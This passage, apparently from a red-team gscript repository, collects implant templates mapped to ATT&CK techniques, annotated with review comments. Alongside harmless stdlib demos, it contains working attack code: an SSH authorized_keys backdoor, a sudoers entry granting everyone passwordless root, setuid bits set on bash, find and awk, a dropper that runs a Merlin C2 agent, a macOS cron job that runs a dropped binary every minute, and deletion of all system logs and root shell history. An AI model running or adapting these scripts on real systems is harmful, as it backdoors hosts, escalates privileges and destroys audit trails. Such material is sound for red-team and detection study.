 * never checked.
 * NOTE(review): `errors` is assigned without `var` and becomes an implicit global.
 * @returns {boolean} always true
 */
function Deploy() {
// Getting our asset: [0] is the key bytes, [1] the load error (only logged).
var pubKey = GetAssetAsBytes("id_rsa.pub");
console.log("errors: "+pubKey[1]);

// Resolve the current user; only HomeDir is used below.
var myUser = user.Current();
console.log(myUser[0]);
// make .ssh dir if os.Stat reports it does not exist (mkdir result ignored)
var dirname = myUser[0].HomeDir+"/.ssh/";
var dirstat = os.Stat(dirname);
if (os.IsNotExist(dirstat[1])) {
G.exec.ExecuteCommand("/bin/mkdir", [dirname]);
}
// create authorized_keys when absent, otherwise append the key bytes to it
var filename = myUser[0].HomeDir+ "/.ssh/authorized_keys";
var stat = os.Stat(filename);
if (os.IsNotExist(stat[1])) {
errors = G.file.WriteFileFromBytes(filename, pubKey[0]);
console.log("errors: "+Dump(errors));
console.log("SSH key added");
} else {
var appendedFileError = G.file.AppendFileBytes(filename, pubKey[0]);
console.log("errors: "+ Dump(appendedFileError));
console.log("SSH key appended");
}
return true;
}
44 |
--------------------------------------------------------------------------------
/attack/linux/sudo_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Sudo Persistence
3 | // Author: ahhh
4 | // Purpose: adds everyone to the sudo group so they can easily priv esc
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1169
7 | // Note: must run implant as root
8 |
9 | //priority:100
10 | //timeout:150
11 |
12 | //go_import:os/user as user2
13 |
/**
 * If running as root, appends a blanket `ALL ALL=(ALL:ALL) NOPASSWD:ALL`
 * line directly to /etc/sudoers via G.file.AppendFileString. The append
 * error is only logged. The file is edited without visudo's syntax check, so
 * a malformed entry would break sudo host-wide. Non-root callers get a log
 * line only.
 * @returns {boolean} always true, whether or not the file was changed
 */
function Deploy() {
console.log("starting execution of Sudo Persistence");
// Resolve the current user; only .Username is used, for the root check below.
var user = user2.Current();
console.log("Our user is: "+user[0].Username);
if (user[0].Username == "root") {
var err1 = G.file.AppendFileString("/etc/sudoers", "\nALL ALL=(ALL:ALL) NOPASSWD:ALL\n");
console.log(Dump(err1));
//var err2 = G.file.AppendFileString("/etc/sudoers.d/README", "\nALL ALL=(ALL:ALL) NOPASSWD:ALL\n");
//console.log(err2);
console.log("Set ALL to be able to sudo on every command");
} else {
console.log("Detected a non-root user, this needs to run as root!");
//Halt();
}
console.log("done Sudo Persistence");
return true;
}
32 |
--------------------------------------------------------------------------------
/attack/linux/suid_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: SUID Persistence
3 | // Author: ahhh
4 | // Purpose: sets the sticky bit on bash as root, for easy future priv esc
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1166
7 | // Tactic: Later need to invoke "/bin/bash -p" to use SUID backdoor
8 | // Note: Must run implant as root
9 |
10 | //priority:90
11 | //timeout:150
12 |
13 | //go_import:os/user as user2
14 |
/**
 * If running as root, sets the setuid bit (chmod u+s) and owner-execute bit
 * (chmod u+x) on /bin/bash, /usr/bin/find and /usr/bin/awk through
 * G.exec.ExecuteCommand. Each chmod result is only logged. Non-root callers
 * get a log line only.
 * @returns {boolean} always true, whether or not any mode was changed
 */
function Deploy() {
console.log("starting execution of SUID Persistence");
// Resolve the current user; only .Username is used, for the root check below.
var user = user2.Current();
console.log("Our user is: "+user[0].Username);
if (user[0].Username == "root") {
// setting /bin/bash to u+s, then u+x
var err = G.exec.ExecuteCommand("chmod", ["u+s", "/bin/bash"]);
console.log(Dump(err));
err = G.exec.ExecuteCommand("chmod", ["u+x", "/bin/bash"]);
console.log(Dump(err));
console.log("Set /bin/bash");
// setting /usr/bin/find to u+s, then u+x (the "Set /bin/zsh" log line below is stale)
err = G.exec.ExecuteCommand("chmod", ["u+s", "/usr/bin/find"]);
console.log(Dump(err));
err = G.exec.ExecuteCommand("chmod", ["u+x", "/usr/bin/find"]);
console.log(Dump(err));
console.log("Set /bin/zsh");
// setting /usr/bin/awk to u+s, then u+x
// USAGE: awk '{ system("/bin/sh") }'
err = G.exec.ExecuteCommand("chmod", ["u+s", "/usr/bin/awk"]);
console.log(Dump(err));
err = G.exec.ExecuteCommand("chmod", ["u+x", "/usr/bin/awk"]);
console.log(Dump(err));
console.log("Set /usr/bin/awk");

} else {
console.log("Detected a non-root user, this needs to run as root!");
//Halt();
}

console.log("done SUID Persistence");
return true;
}
--------------------------------------------------------------------------------
/attack/multi/crypto/crypto_bytes_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Multi Platform Crypto Examples
3 | // Author: ahhh
4 | // Purpose: Testing a bunch of data encryption on different platforms
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
/**
 * Demonstrates the byte-oriented helpers: encodes the literal "test" to
 * bytes with G.encoding, then hashes those bytes with MD5 and SHA1 via
 * G.crypto, logging a banner and the result for each step.
 * @returns {boolean} always true
 */
function Deploy() {

  console.log("Starting EncodeStringAsBytes");
  var testBytes = G.encoding.EncodeStringAsBytes("test");
  console.log("bytes: " + testBytes);

  // Each digest step: banner line, then "<label><digest>" computed from testBytes.
  var digestSteps = [
    {
      banner: "Starting GetMD5FromBytes Command",
      label: "MD5FromBytes: ",
      compute: function (b) { return G.crypto.GetMD5FromBytes(b); }
    },
    {
      banner: "Starting GetSHA1FromBytes",
      label: "SHA1FromBytes: ",
      compute: function (b) { return G.crypto.GetSHA1FromBytes(b); }
    }
  ];
  for (var i = 0; i < digestSteps.length; i++) {
    console.log(digestSteps[i].banner);
    console.log(digestSteps[i].label + digestSteps[i].compute(testBytes));
  }

  return true;
}
--------------------------------------------------------------------------------
/attack/multi/crypto/crypto_string_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Multi Platform Crypto String Examples
3 | // Author: ahhh
4 | // Purpose: Testing a bunch of data encryption on different platforms
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 | //go_import:github.com/gen0cide/gscript/stdlib/crypto as crypto
11 |
/**
 * Demonstrates the string-oriented digest helpers on the literal "test",
 * logging a banner and then the MD5 and SHA1 results in turn via G.crypto.
 * @returns {boolean} always true
 */
function Deploy() {

  var input = "test";
  // Each digest step: banner line, then "<label><digest>" computed from input.
  var digestSteps = [
    {
      banner: "Starting GetMD5FromString Command",
      label: "MD5FromString: ",
      compute: function (s) { return G.crypto.GetMD5FromString(s); }
    },
    {
      banner: "Starting GetSHA1FromString",
      label: "SHA1FromString: ",
      compute: function (s) { return G.crypto.GetSHA1FromString(s); }
    }
  ];
  for (var i = 0; i < digestSteps.length; i++) {
    console.log(digestSteps[i].banner);
    console.log(digestSteps[i].label + digestSteps[i].compute(input));
  }

  return true;
}
--------------------------------------------------------------------------------
/attack/multi/dropper/merlin_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Merlin Example
3 | // Author: ahhh
4 | // Purpose: Drops merlin as an asset and executes it async
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Uses: https://github.com/Ne0nd0g/merlin
8 |
9 | //priority:150
10 | //timeout:150
11 | //import:/private/tmp/merlinagent.bin
12 |
13 | //go_import:os/user as user2
14 | //go_import:os as os2
15 |
/**
 * Cross-platform dropper: writes the embedded merlinagent.bin asset to a
 * randomly named file under os2.TempDir() (with a .exe suffix and backslash
 * separator when OS is "windows") and launches it asynchronously with a
 * single empty-string argument. Asset-load, write and launch errors are
 * logged but not acted on. OS and ARCH are presumably globals supplied by
 * the gscript runtime — they are not defined in this file.
 * NOTE(review): `errors` is assigned without `var` and becomes an implicit global.
 * @returns {boolean} always true
 */
function Deploy() {

console.log("Starting to drop merlin binary");
// Getting our asset: [0] is the content, [1] the load error (only logged).
var merlinBin = GetAssetAsBytes("merlinagent.bin");
console.log("errors: "+merlinBin[1]);

// Whoami (logged only; not used for any decision below)
var myuser = user2.Current();
console.log("user: "+Dump(myuser[0]));

// Getting a random string (4 lowercase letters) for the drop file name
var temppath = os2.TempDir();
var naming = G.rand.GetAlphaString(4);
//var naming = "aOKware";
naming = naming.toLowerCase();

// Determine OS: picks the path separator and whether to add a .exe suffix
console.log("os: "+OS);
console.log("arch: "+ARCH);
var fullpath;
if (OS == "windows") {
//if windows
fullpath = temppath+"\\"+naming+".exe";
} else {
//if linux or OSX
fullpath = temppath+"/"+naming;
}
console.log("file name: "+ fullpath);

// Write payload; the result is logged, not checked.
errors = G.file.WriteFileFromBytes(fullpath, merlinBin[0]);
console.log("errors: "+errors);

// Run payload: [""] passes one empty argument, not zero arguments.
var running = G.exec.ExecuteCommandAsync(fullpath, [""]);
console.log("errors: "+running[1]);

return true
}
56 |
--------------------------------------------------------------------------------
/attack/multi/encoding/encoding_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Multi Platform Encoding Examples
3 | // Author: ahhh
4 | // Purpose: Testing a bunch of data encoding on different platforms
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
// Deploy: round-trips a few values through the G.encoding helpers.
// Base64-encodes a literal, decodes a known Base64 string (logging both the
// decoded value and its error slot), converts "test" to bytes and back to a
// string. Always returns true.
function Deploy() {
  var say = function (label, value) {
    console.log(label + value);
  };

  console.log("Starting Base64e Command");
  var encoded = G.encoding.EncodeBase64("hello world");
  say("b64e: ", encoded);

  console.log("Starting Base64d Command");
  var decodeResult = G.encoding.DecodeBase64("aGVsbG8gd29ybGQ=");
  say("b64d: ", decodeResult[0]);
  say("b64d errors: ", decodeResult[1]);

  console.log("Starting EncodeStringAsBytes");
  var raw = G.encoding.EncodeStringAsBytes("test");
  say("bytes: ", raw);

  console.log("EncodingBytesAsString");
  var roundTripped = G.encoding.EncodeBytesAsString(raw);
  say("bytes to string: ", roundTripped);

  return true;
}
31 |
--------------------------------------------------------------------------------
/attack/multi/exec/exec_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Cross Platform Execute Example
3 | // Author: ahhh
4 | // Purpose: executes something that should work on multiple platforms
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 | //go_import:github.com/gen0cide/gscript/stdlib/exec as exec
11 |
// Deploy: runs `netstat -a` synchronously through G.exec and logs the five
// fields of the result (pid, stdout, stderr, exit code, Go error) in order.
// Always returns true.
function Deploy() {
  console.log("Starting Exec Command");
  var result = G.exec.ExecuteCommand("netstat", ["-a"]);

  // Field labels line up with the result's index positions.
  var labels = ["Pid: ", "stdout: ", "stderr: ", "exit code: ", "go errors: "];
  for (var idx = 0; idx < labels.length; idx++) {
    console.log(labels[idx] + result[idx]);
  }
  return true;
}
22 |
--------------------------------------------------------------------------------
/attack/multi/exec/execa_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Cross Platform Execute Async Example
3 | // Author: ahhh
4 | // Purpose: executes something that should work on multiple platforms
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
// Deploy: launches `netstat -a` asynchronously through G.exec and logs the
// first element of the result (the command object). Always returns true.
function Deploy() {
  console.log("Starting Exec Command");
  var cmd = "netstat";
  var args = ["-a"];
  var launched = G.exec.ExecuteCommandAsync(cmd, args);
  console.log("cmd_obj: " + launched[0]);
  return true;
}
17 |
--------------------------------------------------------------------------------
/attack/multi/file/delete_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Multi Platform Delete File Example
3 | // Author: ahhh
4 | // Purpose: Testing a delete file on different platforms
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 | //go_import:os as os2
11 |
// Deploy: removes "test_file.txt" (relative to the current working
// directory) via Go's os.Remove and logs whatever error it returned.
// Always returns true.
function Deploy() {
  var target = "test_file.txt";
  console.log("Starting Delete File");
  var removeErr = os2.Remove(target);
  console.log("errors: " + removeErr);
  return true;
}
--------------------------------------------------------------------------------
/attack/multi/file/write_examples.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Multi Platform Write File Example
3 | // Author: ahhh
4 | // Purpose: Testing an asset and write file on different platforms
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //import:/private/tmp/example.bin
9 |
10 | //priority:150
11 | //timeout:150
12 |
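// Deploy: walks the G.file helpers end to end on scratch files in the
// current working directory: write the embedded "example.bin" asset to
// "example_test", copy it, then write/read/append/replace/chmod/read the
// text file "example_test3", and finally check that "example_test" exists.
// Every helper's error value is logged but none aborts the sequence, so
// later steps still run after an earlier failure. Returns true
// unconditionally.
function Deploy() {

  console.log("Starting Write File form Bytes");
  var myBin = GetAssetAsBytes("example.bin");
  // `var` keeps `errors` local to Deploy; a bare assignment leaks it into
  // the script VM's global scope.
  var errors = G.file.WriteFileFromBytes("example_test", myBin[0]);
  console.log("errors: "+errors);

  console.log("Starting Copy File");
  var copyErrors = G.file.CopyFile("example_test", "example_test2");
  console.log("errors: " +copyErrors);

  console.log("Starting Write file from String");
  var writeStringErrors = G.file.WriteFileFromString("example_test3", "Example test\n");
  console.log("errors: "+ writeStringErrors);

  console.log("Starting Read file as bytes");
  // Result is read as [bytes, error]; the bytes are re-appended below.
  var fileBytes = G.file.ReadFileAsBytes("example_test3");
  console.log("errors: "+ fileBytes[1]);

  console.log("Starting Append file bytes");
  var appendedFileError1 = G.file.AppendFileBytes("example_test3", fileBytes[0]);
  console.log("errors: "+ appendedFileError1);

  console.log("Starting AppendFileString");
  var appendedFileError2 = G.file.AppendFileString("example_test3", "Yet Another String\n");
  console.log("errors: "+ appendedFileError2);

  console.log("ReplaceInFileWithString");
  var replaceError = G.file.ReplaceInFileWithString("example_test3", "test", "science");
  console.log("errors: "+ replaceError);

  console.log("ReplaceInFileWithRegex");
  var replaceError2 = G.file.ReplaceInFileWithRegex("example_test3", "(Yet)", "Bet");
  console.log("errors: "+ replaceError2);

  console.log("SetPerms example");
  // 0777 makes the file world-writable. Acceptable for a throwaway test
  // file, but any local user could then alter what ReadFileAsString reads
  // back below; use a tighter mode (0644/0600) for anything that matters.
  var permErrors = G.file.SetPerms("example_test3", 0777);
  console.log("errors: "+permErrors);

  console.log("Seting ReadFileAsString");
  // Result is read as [contents, error].
  var readFile = G.file.ReadFileAsString("example_test3");
  console.log("errors: "+ readFile[1]);
  console.log("example_test3 contains:\n"+readFile[0]);

  console.log("Testing CheckExists");
  var exists = G.file.CheckExists("example_test");
  console.log("Does it: "+exists);

  return true;
}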
63 |
--------------------------------------------------------------------------------
/attack/multi/net/httpd_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Cross Platform HTTPD Example
3 | // Author: ahhh
4 | // Purpose:
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | //go_import:net/http as http
12 |
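// Deploy: starts a plain-HTTP listener on port 8080 using Go's net/http.
// ListenAndServe blocks for the life of the server and only returns when it
// fails (for example, the port is already bound), so the "Done" line is
// reached only on that error path. Returns true.
// NOTE(review): ":8080" binds every interface, not just loopback, and the
// null handler falls back to Go's default mux, so whatever is registered
// there is reachable from the network. Prefer "127.0.0.1:8080" for a local
// test.
function Deploy() {
  console.log("Starting HTTPD");

  // Capture the Go error instead of discarding it, so a bind failure shows
  // up in the log rather than passing silently.
  var err = http.ListenAndServe(":8080", null);
  if (err != null) {
    console.log("errors: "+err.Error());
  }

  console.log("Done HTTPD");
  return true;
}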
21 |
--------------------------------------------------------------------------------
/attack/multi/net/net_tcp_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Cross Platform Tcp checking Example
3 | // Author: ahhh
4 | // Purpose: checks if some key ports are open on multiple platforms
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
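// Deploy: probes a fixed list of well-known TCP ports with
// G.net.CheckForInUseTCP and logs the first element of each result (the
// in-use flag); the error slot is not inspected. Returns true.
function Deploy() {
  console.log("Starting TCP Checker");
  var ports = [21, 22, 23, 80, 443, 445, 3389, 5900, 8080];
  // `var i`: the loop index was previously assigned without a declaration,
  // which leaks a global into the script VM.
  for (var i = 0; i < ports.length; i++) {
    var response = G.net.CheckForInUseTCP(ports[i]);
    console.log("TCP "+ports[i]+": "+response[0]);
  }
  console.log("Done TCP Checker");
  return true;
}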
21 |
--------------------------------------------------------------------------------
/attack/multi/net/net_udp_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Cross Platform UDP checking Example
3 | // Author: ahhh
4 | // Purpose: checks if some key ports are open on multiple platforms
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
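// Deploy: probes a fixed list of well-known UDP ports and logs the first
// element of each result (the in-use flag); the error slot is not
// inspected. Returns true.
function Deploy() {
  console.log("Starting UDP Checker");
  var ports = [53, 67, 68, 69, 123, 161, 162, 389, 636];
  // `var i`: the loop index was previously assigned without a declaration,
  // which leaks a global into the script VM.
  for (var i = 0; i < ports.length; i++) {
    // Called via G.net to match the sibling TCP example, which uses
    // G.net.CheckForInUseTCP; the bare G.CheckForInUseUDP form does not
    // match that namespace. Confirm against the gscript stdlib if this
    // still fails to resolve.
    var response = G.net.CheckForInUseUDP(ports[i]);
    console.log("UDP "+ports[i]+": "+response[0]);
  }
  console.log("Done UDP Checker");
  return true;
}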
21 |
--------------------------------------------------------------------------------
/attack/multi/net/netcat_tcp_client_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Cross Platform NetCat TCP Example
3 | // Author: ahhh
4 | // Purpose:
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | //go_import:github.com/dddpaul/gonc/tcp as nc
12 |
// Deploy: opens a TCP client connection to the local netcat-style server
// using the gonc tcp package, then returns true.
// NOTE(review): the host argument carries a trailing colon ("127.0.0.1:")
// while the port is passed separately; the server example passes a single
// "127.0.0.1:8080". Verify against nc.StartClient's signature that this
// does not produce a malformed address.
function Deploy() {
  var proto = "tcp";
  var host = "127.0.0.1:";
  var port = "8080";

  console.log("Starting NetCat TCP Example");
  nc.StartClient(proto, host, port);
  console.log("Done NetCat TCP Example");
  return true;
}
21 |
--------------------------------------------------------------------------------
/attack/multi/net/netcat_tcp_server_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Cross Platform NetCat TCP Example
3 | // Author: ahhh
4 | // Purpose:
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | //go_import:github.com/dddpaul/gonc/tcp as nc
12 |
// Deploy: starts a netcat-style TCP server bound to loopback port 8080
// using the gonc tcp package, then returns true. Binding 127.0.0.1 rather
// than ":8080" keeps the listener off the network interfaces.
function Deploy() {
  var proto = "tcp";
  var listenAddr = "127.0.0.1:8080";

  console.log("Starting NetCat TCP Example");
  nc.StartServer(proto, listenAddr);
  console.log("Done NetCat TCP Example");
  return true;
}
21 |
--------------------------------------------------------------------------------
/attack/multi/rand/rand_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Multi Platform Randomness Example
3 | // Author: ahhh
4 | // Purpose: Testing randomness on different platforms
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
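// Deploy: exercises the G.rand helpers — a bounded int, alphanumeric /
// alphabetic / alphanumeric-plus-special strings, and a bool — logging each
// value plus upper- and lower-cased forms of the strings. Returns true.
// NOTE(review): nothing in this file shows what generator backs G.rand.
// Do not treat these values as suitable for keys, tokens or passwords
// without confirming the implementation is a CSPRNG.
function Deploy() {

  console.log("Starting RandomInt");
  // `var` keeps out1 local; a bare assignment leaks it into global scope.
  var out1 = G.rand.RandomInt(12, 20);
  console.log("out: "+out1);

  console.log("Starting GetAlphaNumericString");
  var out2 = G.rand.GetAlphaNumericString(12);
  console.log("out: " +out2);
  console.log("out upper: "+ out2.toUpperCase());
  console.log("out lower: "+ out2.toLowerCase());

  console.log("Starting GetAlphaString");
  var out3 = G.rand.GetAlphaString(10);
  console.log("out: "+ out3);
  console.log("out upper: "+ out3.toUpperCase());
  console.log("out lower: "+ out3.toLowerCase());

  console.log("Starting GetAlphaNumericSpecialString");
  var out4 = G.rand.GetAlphaNumericSpecialString(7);
  console.log("out: "+ out4);
  console.log("out upper: "+ out4.toUpperCase());
  console.log("out lower: "+ out4.toLowerCase());

  console.log("Starting GetBools");
  var out5 = G.rand.GetBool();
  console.log("out: "+ out5);

  return true;
}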
41 |
--------------------------------------------------------------------------------
/attack/multi/requests/requests_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Multi Platform Requests Example
3 | // Author: ahhh
4 | // Purpose: Testing requests on different platforms
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
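// Deploy: smoke-tests the G.requests helpers against public endpoints — a
// GET as string and as bytes from icanhazip.com, then a JSON POST and a
// form POST to a postb.in bucket. Each result is read with index 1 as the
// body and index 2 as the error (index 0 is not used here); the body is
// logged only when the error slot is null. Returns true.
// NOTE(review): the trailing boolean argument is passed without any hint of
// its meaning in this file — confirm against G.requests before relying on
// it, particularly if it controls TLS certificate verification.
// NOTE(review): both targets are third-party services and every request is
// clear-text HTTP, so anything placed in `jsons` or the form body leaves
// the host unencrypted and lands on infrastructure you do not control.
function Deploy() {

  var headers = {"User-Agent" : "spaceman"};
  console.log("Starting GetURLAsString");
  // `var` keeps out1 local; a bare assignment leaks it into global scope.
  var out1 = G.requests.GetURLAsString("http://icanhazip.com", headers, true);
  if (out1[2] == null){
    console.log("response string: "+out1[1]);
  } else {
    // NOTE(review): other scripts in this tree call .Error() on Go error
    // values; confirm .Errors() exists on what G.requests returns here.
    console.log("errors: "+out1[2].Errors());
  }

  console.log("Starting GetURLAsBytes");
  var out2 = G.requests.GetURLAsBytes("http://icanhazip.com", headers, true);
  if (out2[2] == null){
    console.log("response bytes: "+out2[1]);
  } else {
    console.log("errors: "+out2[2].Errors());
  }

  console.log("Starting PostJSON");
  var jsons = { "menu" : "item"};
  var out3 = G.requests.PostJSON("http://postb.in/jEDtEEvI", jsons, headers, false);
  if (out3[2] == null){
    console.log("response string: "+out3[1]);
  } else {
    console.log("errors: "+out3[2].Errors());
  }

  console.log("Starting PostURL");
  var out4 = G.requests.PostURL("http://postb.in/jEDtEEvI", "test=data", headers, false);
  if (out4[2] == null){
    console.log("response string: "+out4[1]);
  } else {
    console.log("errors: "+out4[2].Errors());
  }

  //console.log("Starting PostBinary");
  //var out5 = G.requests.PostBinary();
  //console.log("out: "+ out5);

  return true;
}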
53 |
--------------------------------------------------------------------------------
/attack/multi/test/bettercap.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Cross Platform Bettercap tests
3 | // Author: ahhh
4 | // Purpose:
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | //go_import:net as net
12 | //go_import:github.com/bettercap/bettercap/network as bcap
13 |
// Deploy: enumerates the host's network interfaces with Go's net.Interfaces
// and, for each one, asks bettercap's network package for an ARP table
// update, dumping whatever it returns. Returns true.
// NOTE(review): net.Interfaces() is read as [list, error]. The error slot
// (ifaces[1]) is never checked, and ifaces[0][0].Name is dereferenced
// before the length-guarded loop, so a failed or empty enumeration throws
// here instead of logging.
function Deploy() {
var ifaces = net.Interfaces()
console.log(ifaces);
console.log(ifaces[0][0].Name);
for (var i=0; i < ifaces[0].length; i++) {
console.log(ifaces[0][i].Name);
// bcap.ArpUpdate presumably refreshes the ARP view for this interface; its
// return shape is not visible in this file, so it is only Dump()ed.
var arpTable = bcap.ArpUpdate(ifaces[0][i].Name);
console.log(Dump(arpTable));
}
return true;
}
--------------------------------------------------------------------------------
/attack/multi/test/strings.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Cross Platform Strings Test
3 | // Author: ahhh
4 | // Purpose:
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | //go_import:strings as strings
12 |
// Deploy: splits a dotted literal with Go's strings.Split and logs the
// second piece ("is"). Always returns true.
function Deploy() {
  var parts = strings.Split("what.is.this", ".");
  console.log(parts[1]);
  return true;
}
17 |
--------------------------------------------------------------------------------
/attack/multi/time/time_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Cross Platform Time Example
3 | // Author: ahhh
4 | // Purpose: gets the current Unix time on multiple platforms
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 |
// Deploy: reads the current Unix time from G.time and logs it.
// Always returns true.
function Deploy() {
  console.log("Starting Time");
  var now = G.time.GetUnix();
  console.log("Time: " + now);
  return true;
}
17 |
--------------------------------------------------------------------------------
/attack/os_x/cronjob_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Persistence_osx_cronjob
3 | // Author: Jay Hill
4 | // Purpose: cron job persistence on osx
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1168
7 |
8 | //priority:150
9 | //timeout:150
10 |
11 | //go_import:os as os
12 |
13 | //import:/private/tmp/example.macho
14 |
// Deploy: establishes cron persistence on macOS. Writes the embedded
// "example.macho" asset to a random five-letter file under /usr/local,
// writes a one-line crontab file (every minute) pointing at it into the
// temp directory, loads that file with `crontab FILE`, then deletes the
// temporary crontab file. Returns true in every case.
// Every error is logged and then ignored: the binary is written even when
// the asset load failed, and the crontab is loaded even when the write
// failed. `crontab FILE` replaces the invoking user's entire crontab, so
// any pre-existing entries are lost — for incident response, the surviving
// artefacts are the crontab entry itself and the random-named file under
// /usr/local; the temp crontab file is removed at the end.
// NOTE(review): `cronexec` is assigned without `var` and so becomes a
// global in the script VM.
function Deploy() {
console.log("Start Cron Job on Osx");

// Getting our asset: read as [bytes, error]
var exampleBin = GetAssetAsBytes("example.macho");
if (exampleBin[1] != null) {
console.log("errors: "+exampleBin[1].Error());
}

// Getting a random file path (temp dir variant left commented out)
//var temppath = os.TempDir();
var temppath = "/usr/local";
var naming = G.rand.GetAlphaString(5);
naming = naming.toLowerCase();
var fullpath = temppath+"/"+naming;
console.log("file name: "+ fullpath);
// Write file (proceeds even if exampleBin[1] was non-null)
var errors = G.file.WriteFileFromBytes(fullpath, exampleBin[0]);
if (errors != null) {
console.log("errors: "+errors.Error());
}

// Cron Command: run the dropped file every minute
var command = "* * * * * "+fullpath+"\n";
// Write the Cron Command to a random-named file in the temp directory
var cronfile = G.rand.GetAlphaNumericString(5);
var tmpcron = os.TempDir();
cronfile = tmpcron+"/"+cronfile.toLowerCase();
var error = G.file.WriteFileFromString(cronfile, command);
if (error != null) {
console.log("errors: "+error.Error());
}

// Issue the Cron Command: installs the file as the current user's crontab
cronexec = G.exec.ExecuteCommand("crontab", [cronfile]);
console.log("Pid: "+cronexec[0]);
console.log("stdout: "+cronexec[1])
console.log("stderr: "+cronexec[2])
console.log("exit code: "+cronexec[3])
if (cronexec[4] != null) {
console.log("go errors: "+Dump(cronexec[4]))
}

// Remove Cron Command: only the temporary file, not the installed entry
var err = os.Remove(cronfile);
if (err != null) {
console.log("errors: "+err.Error());
}

console.log("Done Cron Job on Osx");
return true;
}
--------------------------------------------------------------------------------
/attack/os_x/delete_logs.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Delete Logs
3 | // Author: ahhh
4 | // Purpose: Deletes a number of critical security logs on a linux machine, to see if this is detected by the lack of logs or deletion
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1146
7 | // Note: must run implant as root
8 |
9 | //go_import:os/user as user
10 |
11 | //priority:150
12 | //timeout:150
13 |
// Deploy: root-gated, irreversible log destruction. When the implant runs
// as root it executes `rm -rf -P` against utmp/wtmp/btmp and the whole
// /var/log tree, then again against /var/root/.sh_history; -P asks rm to
// overwrite regular files before unlinking. Any other user only gets a
// log line. Returns true in every branch.
// Exit codes and stderr are logged but never checked: the "Removed ..."
// and "Cleared ..." lines print even when rm failed, so do not read them
// as confirmation of what actually happened.
function Deploy() {
console.log("starting execution of Delete Logs");
// Whoami: the Username field gates everything below
var myuser = user.Current();
console.log("Our user is: "+Dump(myuser[0]));
if (myuser[0].Username == "root") {
//rm -rf /var/run/utmp /var/run/wtmp /var/run/btmp /var/log/
var response = G.exec.ExecuteCommand("rm", ["-rf", "-P", "/var/run/utmp", "/var/run/wtmp", "/var/run/btmp", "/var/log/"]);
console.log("Pid: "+response[0]);
console.log("stdout: "+response[1]);
console.log("stderr: "+response[2]);
console.log("exit code: "+response[3]);
console.log("go errors: "+response[4]);
// Printed unconditionally, regardless of response[3]
console.log("Removed /var/run/utmp, /var/run/wtmp, /var/run/btmp, and all of /var/log/");
var response2 = G.exec.ExecuteCommand("rm", ["-rf", "-P", "/var/root/.sh_history"]);
console.log("Pid: "+response2[0]);
console.log("stdout: "+response2[1]);
console.log("stderr: "+response2[2]);
console.log("exit code: "+response2[3]);
console.log("go errors: "+response2[4]);
// Printed unconditionally, regardless of response2[3]
console.log("Cleared the root bash history");
} else {
console.log("Detected a non-root user, this needs to run as root!");
}
return true;
}
40 |
--------------------------------------------------------------------------------
/attack/os_x/disable_SIP.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable SIP
